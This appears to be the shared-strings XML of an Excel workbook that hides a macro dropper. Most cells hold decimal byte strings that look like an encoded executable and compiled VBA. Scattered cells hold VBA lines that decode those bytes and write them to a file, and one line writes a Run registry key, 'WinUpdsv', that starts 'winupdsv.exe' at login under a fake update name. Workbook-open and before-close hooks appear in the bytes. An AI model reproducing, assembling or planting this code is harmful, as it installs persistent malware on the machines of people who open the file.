154 166 233 3 68 62 56 50 44 166 233 154 174 0 31 38 32 3 26 20 205 178 105 154 14 8 2 252 150 246 82 52 77 215 117 39 240 7 234 3 228 222 216 211 52 77 211 210 204 198 192 186 77 211 52 77 180 174 168 162 156 150 52 77 211 52 144 138 132 126 120 222 52 77 211 114 108 102 96 66 97 115 101 199 111 1 95 114 95 99 108 55 54 52 45 37 115 31 </t>
  </si>
  <si>
    <t>For i = 1 To 28</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 154 34 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 148 255 255 255 255 0 0 0 0 26 80 255 255 255 255 0 0 0 0 2 60 28 1 255 255 0 0 0 0 2 60 32 1 255 255 0 0 0 0 2 60 36 1 255 255 0 0 0 0 2 60 40 1 255 255 0 0 0 0 2 60 44 1 255 255 0 0 0 0 2 60 48 1 255 255 0 0 0 0 2 60 52 1 255 255 0 0 0 0 2 60 56 1 255 255 0 0 0 0 2 60 60 1 255 255 0 0 0 0 2 60 64 1 255 255 0 0 0 0 2 60 68 1 255 255 0 0 0 0 2 60 72 1 255 255 0 0 0 0 2 60 76 1 255 255 0 0 0 0 2 60 80 1 255 255 0 0 0 0 2 60 84 1 255 255 0 0 0 0 2 60 88 1 255 255 0 0 0 0 2 60 92 1 255 255 0 0 0 0 2 60 96 1 255 255 0 0 0 0 2 60 100 1 255 255 0 0 0 0 2 60 104 1 255 255 0 0 0 0 2 60 108 1 255 255 0 0 0 0 2 60 112 1 255 255 0 0 0 0 2 60 116 1 255 255 0 0 0 0 2 60 120 1 255 255 0 0 0 0 2 60 124 1 255 255 0 0 0 0 2 60 128 1 255 255 0 0 0 0 2 60 132 1 255 255 0 0 0 0 2 60 136 1 255 255 0 0 0 0 2 60 140 1 255 255 0 0 0 0 2 60 144 1 255 255 0 0 0 0 2 60 148 1 255 255 0 0 0 0 2 60 152 1 255 255 0 0 0 0 2 60 156 1 255 255 0 0 0 0 2 60 160 1 255 255 0 0 0 0 2 60 164 1 255 255 0 0 0 0 2 60 168 1 255 255 0 0 0 0 2 60 172 1 255 255 0 0 0 0 2 60 176 1 255 255 0 0 0 0 2 60 180 1 255 255 0 0 0 0 2 60 184 1 255 255 0 0 0 0 2 60 188 1 255 255 0 0 0 0 2 60 192 1 255 255 0 0 0 0 2 60 196 1 255 255 0 0 0 0 2 60 200 1 255 255 </t>
  </si>
  <si>
    <t xml:space="preserve">95 0 95 0 83 0 82 0 80 0 95 0 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 1 11 0 0 0 6 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 65 0 0 0 134 16 0 0 0 0 0 0 95 0 95 0 83 0 82 0 80 0 95 0 51 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 61 0 0 0 74 1 0 0 0 0 0 0 95 0 86 0 66 0 65 0 95 0 80 0 82 0 79 0 74 0 69 0 67 0 84 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 26 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 67 0 0 0 131 13 0 0 0 0 0 0 100 0 105 0 114 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 8 0 2 0 7 0 0 0 12 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 122 0 0 0 232 1 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 2 60 204 1 255 255 0 0 0 0 2 60 208 1 255 255 0 0 0 0 2 60 212 1 255 255 0 0 0 0 2 60 216 1 255 255 0 0 0 0 2 60 220 1 255 255 0 0 0 0 2 60 224 1 255 255 0 0 0 0 2 60 228 1 255 255 0 0 0 0 2 60 232 1 255 255 0 0 0 0 2 60 236 1 255 255 0 0 0 0 2 60 240 1 255 255 0 0 0 0 2 60 244 1 255 255 0 0 0 0 2 60 248 1 255 255 0 0 0 0 2 60 252 1 255 255 0 0 0 0 2 60 255 255 255 255 0 0 255 255 1 1 0 0 0 0 1 0 78 0 48 0 123 0 70 0 67 0 70 0 66 0 51 0 68 0 50 0 65 0 45 0 65 0 48 0 70 0 65 0 45 0 49 0 48 0 54 0 56 0 45 0 65 0 55 0 51 0 56 0 45 0 48 0 56 0 48 0 48 0 50 0 66 0 51 0 51 0 55 0 49 0 66 0 53 0 125 0 7 0 0 0 255 255 255 255 1 1 184 14 0 0 29 0 12 0 37 0 0 0 42 128 45 2 255 255 255 255 56 0 28 0 0 0 0 0 5 0 0 0 0 0 3 64 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 12 17 52 2 152 0 0 0 0 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 144 13 0 0 176 254 107 0 112 0 0 0 255 255 255 255 40 0 0 0 15 0 15 0 2 0 148 1 0 1 0 0 41 131 55 2 255 255 255 255 12 0 255 255 144 0 0 0 0 0 0 0 255 255 255 255 132 0 0 0 38 2 1 0 29 0 16 0 37 0 0 0 12 17 76 2 32 1 0 0 1 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 240 3 0 0 192 254 111 0 216 0 0 0 255 255 255 255 44 0 1 0 52 0 52 0 17 0 148 2 0 1 0 0 41 131 55 2 255 255 255 255 12 0 255 255 248 0 0 0 0 0 0 0 0 1 0 0 132 0 0 0 28 2 32 0 29 0 16 0 37 0 0 0 105 131 78 2 255 255 255 255 16 0 </t>
  </si>
  <si>
    <t xml:space="preserve">49 0 51 0 45 0 48 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 67 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 52 0 54 0 125 0 35 0 49 0 46 0 52 0 35 0 48 0 35 0 67 0 58 0 92 0 80 0 114 0 111 0 103 0 114 0 97 0 109 0 32 0 70 0 105 0 108 0 101 0 115 0 92 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 79 0 102 0 102 0 105 0 99 0 101 0 92 0 79 0 102 0 102 0 105 0 99 0 101 0 49 0 48 0 92 0 69 0 88 0 67 0 69 0 76 0 46 0 69 0 88 0 69 0 35 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 69 0 120 0 99 0 101 0 108 0 32 0 49 0 48 0 46 0 48 0 32 0 79 0 98 0 106 0 101 0 99 0 116 0 32 0 76 0 105 0 98 0 114 0 97 0 114 0 121 0 0 0 0 0 0 0 0 0 0 0 0 0 184 0 42 0 92 0 71 0 123 0 48 0 48 0 48 0 50 0 48 0 52 0 51 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 67 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 52 0 54 0 125 0 35 0 50 0 46 0 48 0 35 0 48 0 35 0 67 0 58 0 92 0 87 0 73 0 78 0 78 0 84 0 92 0 115 0 121 0 115 0 116 0 101 0 109 0 51 0 50 0 92 0 115 0 116 0 100 0 111 0 108 0 101 0 50 0 46 0 116 0 108 0 98 0 35 0 79 0 76 0 69 0 32 0 65 0 117 0 116 0 111 0 109 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 0 0 0 0 0 0 0 0 10 1 42 0 92 0 71 0 123 0 50 0 68 0 70 0 56 0 68 0 48 0 52 0 67 0 45 0 53 0 66 0 70 0 65 0 45 0 49 0 48 0 49 0 66 0 45 0 66 0 </t>
  </si>
  <si>
    <t xml:space="preserve">247 219 124 36 255 101 140 223 242 236 159 117 248 9 15 143 108 110 28 8 97 10 251 246 181 124 182 9 28 88 251 15 79 113 202 45 149 232 53 207 71 249 62 145 34 237 44 159 173 185 20 50 248 2 41 139 130 86 106 195 104 184 214 106 1 217 165 93 213 131 142 125 12 18 210 137 185 31 51 245 119 28 137 110 131 130 211 229 137 94 40 148 10 99 255 27 163 75 7 141 69 255 137 70 44 184 22 224 65 187 53 40 22 188 193 187 17 68 72 3 21 182 191 125 76 184 171 170 0 247 225 209 234 137 62 60 36 105 241 90 189 47 211 79 40 85 81 90 55 36 238 249 53 46 74 71 40 26 15 78 68 56 128 58 216 182 189 81 122 10 60 90 6 84 106 4 111 204 157 54 81 134 36 45 44 142 12 66 109 219 227 141 20 141 119 84 12 76 48 60 11 118 108 165 212 52 8 211 86 56 11 109 57 154 109 69 6 60 62 229 222 209 92 98 163 173 127 44 80 33 72 110 137 150 135 199 101 115 225 251 84 137 142 217 92 17 63 208 182 87 180 124 23 111 198 70 29 155 225 63 118 121 95 140 116 194 32 0 161 120 207 30 71 43 13 240 130 24 217 136 252 25 8 50 32 223 11 254 250 216 5 3 44 239 237 8 81 249 5 237 13 124 8 106 15 3 245 96 12 123 53 33 192 207 12 230 49 198 210 49 96 207 58 193 239 24 246 37 160 4 52 194 95 4 94 114 123 247 221 255 226 24 133 219 15 134 238 16 85 129 251 176 21 191 195 114 5 184 8 31 168 176 240 43 216 196 16 205 208 208 193 105 70 255 141 234 191 234 247 221 193 229 4 3 197 15 185 131 140 125 187 46 3 205 4 110 1 3 249 7 2 3 12 50 200 32 4 5 6 50 200 32 131 7 8 9 200 32 131 12 10 11 12 59 131 12 50 13 14 15 3 142 50 108 124 131 198 16 74 154 119 37 182 187 224 237 221 141 73 143 22 3 202 70 24 72 117 245 178 185 241 74 188 91 148 255 142 199 191 8 49 173 187 180 221 17 247 247 234 139 49 135 20 51 93 23 175 39 28 254 91 193 224 16 95 11 193 7 47 141 130 133 163 192 6 232 185 30 1 236 139 255 </t>
  </si>
  <si>
    <t>m = InStr(hv, " ")</t>
  </si>
  <si>
    <t xml:space="preserve">84 152 84 69 251 60 41 155 198 107 52 17 96 85 42 6 69 225 6 195 108 27 82 63 121 81 117 57 220 227 70 108 121 192 8 102 102 3 27 78 177 96 196 20 127 27 47 53 237 102 20 3 108 31 67 114 211 101 54 35 242 149 58 0 78 116 213 52 169 185 255 6 27 84 68 76 76 46 3 10 187 99 221 173 185 49 46 52 32 147 102 108 74 32 16 32 155 136 183 11 211 112 121 161 103 104 116 245 53 45 252 194 237 133 50 217 50 32 74 106 110 45 47 117 112 32 71 97 129 68 139 40 95 48 103 190 93 231 224 96 103 31 1 8 3 160 104 11 5 115 109 176 38 251 8 11 6 95 1 23 156 137 165 57 4 16 107 43 7 205 32 31 246 23 11 128 0 128 32 0 179 45 226 157 1 9 228 4 11 236 40 59 205 2 1 16 0 1 3 134 100 72 134 2 3 4 148 133 100 72 5 103 216 145 141 108 87 71 6 3 32 131 12 50 7 8 9 131 12 50 200 10 11 12 13 134 165 202 38 0 155 220 255 95 254 123 16 17 18 7 9 6 10 5 11 4 12 3 13 2 14 1 15 107 105 154 166 219 141 140 3 76 204 44 172 166 105 154 166 108 236 28 156 92 154 166 105 154 220 60 188 124 252 2 105 154 166 105 130 66 194 34 162 166 105 154 166 98 226 18 146 82 154 166 105 154 210 50 178 114 242 10 105 154 166 105 138 74 202 42 170 166 105 154 166 106 234 26 154 90 154 166 105 154 218 58 186 122 250 6 105 154 166 105 134 70 198 38 166 166 105 154 166 102 230 22 150 86 154 166 105 154 214 54 182 118 246 14 105 154 166 105 142 78 206 46 174 166 105 154 166 110 238 30 158 94 154 166 105 154 222 62 190 126 254 1 105 154 166 105 129 65 193 33 161 166 105 154 166 97 225 17 145 81 154 166 105 154 209 49 177 113 241 9 105 154 166 105 137 73 201 41 169 166 105 154 166 105 233 25 153 89 154 166 105 154 217 57 185 121 249 5 105 154 166 105 133 69 197 37 165 166 105 154 166 101 229 21 149 85 154 166 105 154 213 53 181 117 245 13 105 154 166 105 141 77 205 45 173 166 105 154 166 109 237 29 157 93 155 166 105 154 </t>
  </si>
  <si>
    <t xml:space="preserve">16 0 37 0 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 48 3 0 0 128 0 0 0 255 255 255 255 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 248 2 0 0 128 0 0 0 40 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 0 3 0 0 128 0 0 0 0 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 144 3 0 0 128 0 0 0 32 0 70 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 176 3 0 0 128 0 0 0 104 2 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 208 3 0 0 128 0 0 0 104 2 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 176 2 0 0 128 0 0 0 104 2 0 0 255 255 255 255 0 1 0 0 255 255 255 255 255 255 255 255 255 255 255 255 144 4 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 160 6 0 0 255 255 255 255 24 5 0 0 255 255 255 255 255 255 255 255 184 4 0 0 96 5 0 0 72 5 0 0 255 255 255 255 48 5 0 0 0 5 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 64 14 0 0 168 4 0 0 32 132 55 2 255 255 255 255 120 255 255 255 112 3 0 0 128 0 0 0 8 1 0 0 255 255 255 255 144 4 0 0 0 0 0 0 255 255 255 255 64 4 254 255 232 4 0 0 116 255 255 255 8 0 255 255 32 0 0 0 8 0 255 255 255 255 255 255 18 2 86 2 88 2 90 2 84 2 92 2 94 2 96 2 8 0 255 255 64 4 254 255 255 255 255 255 112 255 255 255 8 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 255 255 255 255 110 255 </t>
  </si>
  <si>
    <t xml:space="preserve">0 7 0 67 111 108 117 109 110 115 112 57 96 0 5 0 78 97 109 101 115 206 191 96 0 12 0 82 101 102 101 114 115 84 111 82 49 67 49 181 99 96 0 8 0 67 97 116 101 103 111 114 121 180 92 96 0 9 0 77 97 99 114 111 84 121 112 101 118 134 96 0 9 0 120 108 67 111 109 109 97 110 100 204 195 96 0 5 0 83 97 118 101 100 100 201 96 0 23 4 65 112 112 95 87 111 114 107 98 111 111 107 66 101 102 111 114 101 67 108 111 115 101 71 95 96 0 6 4 67 97 110 99 101 108 241 152 96 0 8 0 104 97 115 115 97 118 101 100 142 197 96 0 2 0 99 104 204 92 96 0 6 0 77 115 103 66 111 120 151 82 96 0 14 0 65 99 116 105 118 101 87 111 114 107 98 111 111 107 19 162 96 0 13 0 118 98 89 101 115 78 111 67 97 110 99 101 108 232 113 96 0 13 0 118 98 69 120 99 108 97 109 97 116 105 111 110 133 200 96 0 8 0 118 98 67 97 110 99 101 108 39 238 96 0 4 0 118 98 78 111 167 37 96 0 8 0 83 101 110 100 75 101 121 115 78 30 96 0 16 0 67 104 97 110 103 101 70 105 108 101 65 99 99 101 115 115 88 179 96 0 10 0 120 108 82 101 97 100 79 110 108 121 25 230 96 0 4 4 113 117 105 116 57 174 96 0 5 0 118 98 89 101 115 97 63 96 0 7 0 68 105 97 108 111 103 115 138 202 96 0 14 0 120 108 68 105 97 108 111 103 83 97 118 101 65 115 251 221 96 0 4 0 83 104 111 119 15 245 96 0 2 4 97 49 107 92 96 0 4 0 83 97 118 101 146 208 96 0 7 4 115 101 116 102 108 97 103 6 54 96 0 16 4 65 112 112 95 87 111 114 107 98 111 111 107 79 112 101 110 179 5 96 0 5 0 82 84 114 105 109 133 206 96 0 5 0 76 84 114 105 109 244 98 96 0 5 0 67 101 108 108 115 26 141 96 0 5 0 86 97 108 117 101 228 75 96 0 13 0 68 105 115 112 108 97 121 65 108 101 114 116 115 244 246 96 0 1 0 105 96 16 96 0 1 0 119 109 16 96 0 12 0 67 114 101 97 116 101 79 98 106 </t>
  </si>
  <si>
    <t xml:space="preserve">114 85 128 0 0 0 0 0 0 0 128 0 0 0 128 0 0 0 0 0 0 0 30 0 0 0 9 0 0 0 0 0 0 0 9 0 0 0 0 0 3 0 48 0 0 0 0 0 0 0 4 0 4 0 42 0 0 0 169 9 0 0 0 0 0 0 89 9 0 0 0 0 0 0 49 9 0 0 0 0 0 0 9 8 0 0 0 0 0 0 17 5 0 0 0 0 0 0 112 0 0 0 0 0 0 0 9 0 0 0 0 0 4 0 193 9 0 0 0 0 0 0 233 9 0 0 0 0 0 0 9 10 0 0 0 0 0 0 89 10 0 0 0 0 0 0 121 10 0 0 0 0 0 0 161 10 0 0 0 0 0 0 201 10 0 0 0 0 0 0 1 11 0 0 0 0 0 0 129 11 0 0 0 0 0 0 201 11 0 0 0 0 0 0 9 12 0 0 0 0 0 0 41 12 0 0 0 0 0 0 89 13 0 0 0 0 0 0 201 13 0 0 0 0 0 0 73 12 0 0 0 0 0 0 105 12 0 0 0 0 0 0 129 9 0 0 0 0 0 0 145 12 0 0 0 0 0 0 185 12 0 0 0 0 0 0 57 14 0 0 0 0 0 0 89 14 0 0 0 0 0 0 65 15 0 0 0 0 0 0 177 14 0 0 0 0 0 0 201 14 0 0 0 0 0 0 9 16 0 0 0 0 0 0 241 14 0 0 0 0 0 0 25 15 0 0 0 0 0 0 193 6 0 0 0 0 0 0 121 16 0 0 0 0 0 0 201 16 0 0 0 0 0 0 73 17 0 0 0 0 0 0 201 17 0 0 0 0 0 0 25 18 0 0 0 0 0 0 49 18 0 0 0 0 0 0 137 18 0 0 0 0 0 0 1 0 1 0 0 0 2 0 113 6 0 0 0 0 0 0 153 6 0 0 0 0 0 0 193 6 0 0 0 0 0 0 255 255 255 255 73 6 0 0 0 0 0 0 64 0 2 0 52 0 0 0 233 6 0 0 0 0 0 0 129 0 0 0 0 0 1 0 17 7 0 0 0 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 14 0 31 0 60 0 0 0 201 7 0 0 0 0 0 0 161 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">94 183 20 185 242 232 139 230 139 37 137 11 168 92 235 58 225 14 80 24 218 4 223 118 87 104 98 117 182 110 73 131 238 138 201 120 117 177 48 198 170 133 136 32 223 66 133 250 214 217 87 87 120 2 131 205 115 60 190 157 169 249 139 217 185 7 186 10 233 185 138 11 3 82 181 161 100 148 247 152 6 127 173 111 233 212 140 103 75 6 222 67 239 255 37 110 135 199 184 64 63 70 139 125 4 59 199 116 110 59 242 223 244 233 127 242 125 10 102 1 180 129 126 235 46 250 21 59 197 116 8 255 187 197 12 200 17 7 129 180 24 21 131 254 10 127 9 198 76 247 116 13 184 7 8 188 133 232 116 237 101 37 7 123 235 26 87 15 6 77 135 101 147 10 163 112 216 75 203 56 23 122 141 174 110 255 242 11 241 17 31 239 12 130 24 132 249 0 223 26 110 166 79 2 249 16 98 131 203 255 57 205 109 8 107 73 235 237 228 198 4 199 172 118 13 195 6 69 141 40 62 235 6 95 30 174 51 221 237 20 81 16 241 173 209 220 133 31 91 125 8 59 148 132 120 51 253 221 91 176 183 255 167 163 47 43 188 168 118 213 139 183 166 79 238 136 180 22 94 33 43 215 191 92 24 180 168 233 241 166 159 116 214 211 226 125 102 9 144 176 167 247 34 51 246 119 138 152 8 136 28 17 11 177 106 189 27 100 13 219 80 8 20 5 252 223 197 215 9 74 65 237 177 16 42 202 102 211 238 141 76 58 240 182 181 139 45 253 176 63 140 235 20 81 148 91 139 125 176 45 27 226 87 3 207 78 137 129 173 208 142 204 194 39 102 16 108 114 129 109 95 52 118 153 38 235 7 148 174 50 128 240 17 183 184 182 65 91 112 47 8 225 176 180 64 19 102 34 44 180 65 72 63 201 253 67 14 81 0 176 39 68 126 88 116 71 8 22 187 130 242 137 19 121 143 211 230 211 103 232 108 82 176 77 16 108 34 35 108 16 48 248 111 242 164 184 21 33 3 194 186 10 5 184 68 32 7 200 184 13 233 34 19 201 243 3 241 190 228 138 144 3 188 188 64 6 89 166 245 9 85 128 157 144 9 247 235 18 238 3 166 160 217 7 104 137 7 74 33 67 114 201 </t>
  </si>
  <si>
    <t>buf = CByte(Mid(hv, n, m - n))</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 40 8 0 0 80 13 0 0 72 10 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 96 10 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 224 7 0 0 208 7 0 0 32 132 55 2 255 255 255 255 120 255 255 255 16 6 0 0 128 0 0 0 16 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 56 2 0 0 128 0 0 0 168 1 0 0 32 132 55 2 255 255 255 255 120 255 255 255 8 3 0 0 128 0 0 0 144 1 0 0 32 132 55 2 255 255 255 255 120 255 255 255 104 3 0 0 128 0 0 0 6 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 168 5 0 0 128 0 0 0 96 1 0 0 48 9 0 0 184 7 0 0 0 0 255 255 6 0 255 255 255 255 255 255 28 2 122 2 120 2 18 2 46 2 72 2 32 0 0 0 6 0 255 255 64 4 254 255 112 8 0 0 116 255 255 255 9 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 24 10 0 0 112 255 255 255 8 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 64 8 0 0 96 255 255 255 12 0 255 255 32 0 0 0 9 0 255 255 64 4 254 255 88 8 0 0 80 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 232 8 0 0 64 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 184 8 0 0 60 255 255 255 9 0 255 255 32 0 0 0 9 0 255 255 64 4 254 255 160 8 0 0 44 255 255 255 12 0 255 255 32 0 0 0 9 0 255 255 64 4 254 255 112 9 0 0 28 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 208 8 0 0 24 255 255 255 9 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 255 255 255 255 20 255 255 255 9 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 0 9 0 0 4 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 24 9 0 0 244 254 </t>
  </si>
  <si>
    <t xml:space="preserve">139 221 233 116 223 5 133 143 228 131 197 4 79 137 11 137 153 154 92 192 15 78 251 207 209 22 11 18 31 95 209 11 197 229 129 3 13 25 20 126 103 173 205 28 253 220 129 198 255 218 225 63 29 148 189 89 176 28 229 226 208 229 11 153 176 110 82 28 233 245 73 56 221 6 226 84 102 194 97 216 39 155 108 243 5 153 126 96 141 115 134 51 144 61 81 21 141 83 127 12 35 153 8 100 117 252 244 6 158 12 200 85 252 4 51 255 140 23 65 42 194 142 163 215 188 127 27 95 106 176 149 13 56 151 28 192 64 130 93 10 155 100 7 56 144 118 20 157 57 56 144 148 124 235 27 57 241 201 128 141 92 102 159 3 71 59 253 127 66 15 45 22 109 45 92 75 73 81 141 136 140 200 237 99 0 67 103 188 75 83 12 128 9 126 124 52 34 211 117 195 111 144 152 130 111 241 124 236 12 20 107 51 201 133 210 91 16 106 85 54 1 95 31 156 11 182 133 48 219 74 9 144 105 49 123 84 248 52 17 65 8 154 250 75 224 17 170 196 132 124 179 2 251 72 205 9 151 95 52 179 162 8 16 143 45 176 186 84 140 16 8 13 172 166 118 111 114 135 150 179 4 77 152 98 139 20 154 150 30 209 147 241 226 177 166 6 114 187 141 223 59 203 4 138 110 71 3 111 137 220 126 102 30 151 235 168 172 15 196 215 41 239 5 44 156 38 252 141 84 10 240 163 59 167 184 108 219 172 140 30 101 37 231 97 184 122 48 154 139 133 168 202 60 149 224 191 133 135 141 165 133 170 32 108 125 168 52 149 34 107 74 226 40 200 64 68 84 208 91 9 132 55 89 64 207 11 3 253 176 36 143 77 129 253 0 147 183 122 197 66 9 66 189 61 254 213 193 11 157 217 138 234 60 186 230 36 53 84 155 240 200 217 185 2 156 190 242 59 206 79 246 67 8 176 157 29 52 186 168 83 235 58 108 73 20 178 26 255 36 106 124 16 46 123 52 190 102 187 202 75 52 189 88 191 67 242 179 208 246 71 129 44 189 160 214 18 14 163 53 88 208 140 20 75 154 229 146 3 20 237 50 168 65 70 182 65 229 143 168 206 212 130 207 77 25 59 136 152 130 191 150 231 </t>
  </si>
  <si>
    <t>Put #1, , buf</t>
  </si>
  <si>
    <t xml:space="preserve">230 2 0 2 0 2 0 19 4 216 254 254 193 76 255 6 0 0 0 93 251 51 28 129 2 0 43 245 1 0 0 0 4 116 255 8 120 255 13 8 1 4 0 108 116 255 27 29 0 245 0 0 0 0 254 253 245 0 0 0 0 214 47 116 255 28 68 2 0 118 4 116 255 8 120 255 13 8 1 4 0 108 116 255 27 32 0 42 70 40 255 37 254 193 76 255 5 0 0 0 37 4 196 254 4 56 255 5 0 0 36 1 0 13 28 0 2 0 8 56 255 13 216 1 3 0 8 196 254 254 162 60 255 0 0 0 0 1 0 253 243 33 0 25 192 254 8 192 254 254 162 8 255 240 1 0 0 1 0 252 86 195 47 116 255 41 6 0 56 255 196 254 192 254 54 6 0 60 255 40 255 8 255 28 59 2 0 7 244 255 132 16 0 0 3 19 30 66 2 0 2 0 5 30 85 2 0 2 0 2 0 15 245 9 4 0 0 8 120 255 13 152 1 4 0 0 16 39 60 255 27 30 0 10 31 0 8 0 53 60 255 0 28 245 9 4 0 0 39 24 255 37 39 76 255 37 245 3 0 0 0 8 120 255 13 96 0 4 0 0 2 30 228 2 0 2 0 43 245 1 0 0 0 4 116 255 8 120 255 13 8 1 4 0 108 116 255 27 29 0 245 0 0 0 0 254 253 245 0 0 0 0 214 47 116 255 28 182 2 0 3 19 0 2 0 16 39 60 255 27 30 0 10 31 0 8 0 53 60 255 0 28 245 9 4 0 0 39 24 255 37 39 76 255 37 245 3 0 0 0 8 120 255 13 96 0 4 0 0 2 0 81 127 16 0 244 0 198 253 248 248 254 4 196 254 40 76 255 1 0 37 4 56 255 8 120 255 13 192 1 4 0 8 56 255 13 100 0 7 0 8 196 254 87 60 255 8 0 58 24 255 35 0 93 251 47 40 255 251 39 8 255 255 27 41 4 0 56 255 196 254 54 4 0 60 255 248 254 28 72 3 0 17 108 120 255 253 156 56 255 16 52 0 34 0 26 56 255 0 2 0 17 244 255 245 9 4 0 0 8 120 255 13 168 1 4 0 0 0 19 128 0 0 0 0 0 12 0 188 0 96 3 48 0 8 0 0 0 0 0 19 0 </t>
  </si>
  <si>
    <t>w.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdsv", "winupdsv.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">140 17 194 65 146 111 69 118 28 165 194 204 21 38 3 13 52 97 227 189 40 7 17 200 98 113 179 130 97 66 230 89 88 130 60 35 9 20 115 91 111 103 155 64 113 58 152 88 246 116 135 144 145 236 83 170 207 148 219 182 147 109 103 100 229 87 97 15 70 29 83 55 194 146 220 155 148 79 98 106 43 126 11 30 91 247 6 167 26 72 15 112 113 33 96 108 207 9 65 108 163 99 12 134 245 134 112 216 189 101 37 40 180 40 78 179 49 37 0 194 78 104 21 102 83 10 34 118 103 115 51 199 19 10 75 101 227 16 112 30 180 119 26 22 15 212 31 12 47 138 97 81 14 7 194 10 246 112 154 115 13 70 21 58 218 210 76 107 11 134 110 212 11 198 9 131 31 115 70 65 142 21 18 158 221 5 81 102 105 103 178 85 115 126 246 2 246 92 117 58 165 14 163 172 221 248 27 103 83 67 77 202 97 103 49 15 107 22 75 54 133 174 14 138 24 89 107 39 67 104 8 43 115 88 20 165 86 190 165 49 83 75 136 5 108 109 162 4 187 157 11 141 73 27 149 115 111 67 108 102 34 219 210 176 23 116 144 217 106 217 116 9 179 201 98 243 77 115 151 197 225 52 11 177 26 135 50 92 115 192 195 42 56 67 174 68 67 149 25 136 157 161 101 159 93 34 225 92 165 198 66 43 188 224 128 195 38 12 195 39 45 205 13 44 96 166 88 6 131 15 10 186 195 146 192 64 104 73 78 115 205 53 136 245 199 120 6 27 28 144 59 247 102 116 36 47 111 66 108 116 47 155 45 216 33 194 60 144 161 255 82 5 223 150 237 255 255 45 20 255 172 7 255 120 6 255 119 2 63 80 14 46 11 255 134 109 219 246 255 17 255 169 16 255 139 1 255 123 2 255 154 8 111 32 10 11 9 242 111 219 178 14 117 159 50 87 32 144 24 255 103 19 255 128 251 182 108 219 202 14 48 23 66 86 20 108 3 255 16 2 109 255 151 109 54 14 119 188 10 255 91 